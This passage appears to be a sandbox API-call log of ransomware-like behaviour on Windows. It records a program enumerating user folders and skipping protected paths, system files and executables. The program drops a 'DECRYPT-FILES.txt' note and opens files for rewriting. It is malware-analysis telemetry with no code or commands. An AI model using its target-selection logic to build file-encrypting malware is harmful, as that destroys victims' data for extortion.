HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="AhnLab") returned 0x0 [0180.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0180.563] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.563] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\0a16c9.tmp") returned 85 [0180.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0180.563] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.563] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt") returned 92 [0180.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0180.563] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0180.563] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.564] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.564] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.564] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec0b7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.564] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.564] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.564] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.564] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.564] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.564] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.564] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0180.564] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.564] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0180.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\0a16c9.tmp" [0180.564] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.565] CloseHandle (hObject=0x0) returned 0 [0180.565] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.565] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.565] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.565] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0180.565] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0180.565] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0180.565] lstrcatW (in: lpString1="Quick Launch", lpString2="\\" | out: lpString1="Quick Launch\\") returned="Quick Launch\\" [0180.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Program Files") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch=":\\Windows") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Games\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\All Users") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="AhnLab") returned 0x0 [0180.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0180.566] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.566] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\0a16c9.tmp") returned 98 [0180.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.566] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0180.566] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.566] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt") returned 105 [0180.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.567] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0180.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0180.567] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.567] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.567] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.567] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec0b7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.567] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.567] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.567] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.567] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.567] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.567] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.567] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 87 [0180.567] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.567] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0180.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\0a16c9.tmp" [0180.568] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.568] CloseHandle (hObject=0x0) returned 0 [0180.568] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.568] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.568] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.568] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4eb35ad0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.568] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0180.568] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0180.568] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0180.568] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0180.568] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df47e00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df47e00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a683760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x8e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0180.568] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.568] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="autorun.inf") returned 1 [0180.568] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot.ini") returned 1 [0180.568] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="desktop.ini") returned 1 [0180.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat") returned -1 [0180.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="iconcache.db") returned -1 [0180.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootsect.bak") returned 1 [0180.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat.log") returned -1 [0180.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="thumbs.db") returned -1 [0180.569] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Bootfont.bin") returned 1 [0180.569] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0180.569] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.569] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb0f970, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb0f970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x4eb0f970, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="autorun.inf") returned 1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="boot.ini") returned 1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="desktop.ini") returned 1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="ntuser.dat") returned -1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="iconcache.db") returned 1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="bootsect.bak") returned 1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="ntuser.dat.log") returned -1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="thumbs.db") returned -1 [0180.569] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Bootfont.bin") returned 1 [0180.569] lstrlenW (lpString="Launch Internet Explorer Browser.lnk") returned 36 [0180.569] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.569] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="autorun.inf") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="boot.ini") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="desktop.ini") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="iconcache.db") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="bootsect.bak") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat.log") returned 1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="thumbs.db") returned -1 [0180.569] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Bootfont.bin") returned 1 [0180.569] lstrlenW (lpString="Shows Desktop.lnk") returned 17 [0180.569] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.569] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 